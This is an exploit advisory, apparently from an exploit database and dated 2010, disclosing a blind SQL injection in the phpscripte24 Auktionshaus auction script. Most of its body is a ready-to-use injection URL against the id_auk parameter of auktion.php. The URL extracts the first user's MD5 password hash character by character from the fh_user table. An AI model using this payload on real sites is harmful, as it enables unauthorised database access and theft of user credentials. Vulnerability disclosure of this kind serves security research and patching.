phpscripte24 Auktionshaus Community Standart System SQL Injection

2010-03-17
ID: 11338
CVE: None
Download vulnerable application: None
phpscripte24 Auktionshaus Community Standart System Blind SQL Injection
=======================================================================
 ----------------------------Information------------------------------------------------
+Name : phpscripte24 Auktionshaus Community Standart System Blind SQL Injection
+Autor : Easy Laster
+Date   : 16.03.2010
+Script  : phpscripte24 Auktionshaus Community Standart System
+Price : ? 139.99
+Language :PHP
+Discovered by Easy Laster
 ----------------------------------------------------------------------------------------
+Vulnerability : http://server/auktion/auktion.php?id_auk=
  #password md5
+Exploitable   : http://server/auktion/auktion.php?id_auk=1+and+1=1+and+ascii
(substring((SELECT password FROM fh_user+WHERE+iduser=1 LIMIT 0,1),1,1))>1
  -----------------------------------------------------------------------------------------
1-4-2 (www01)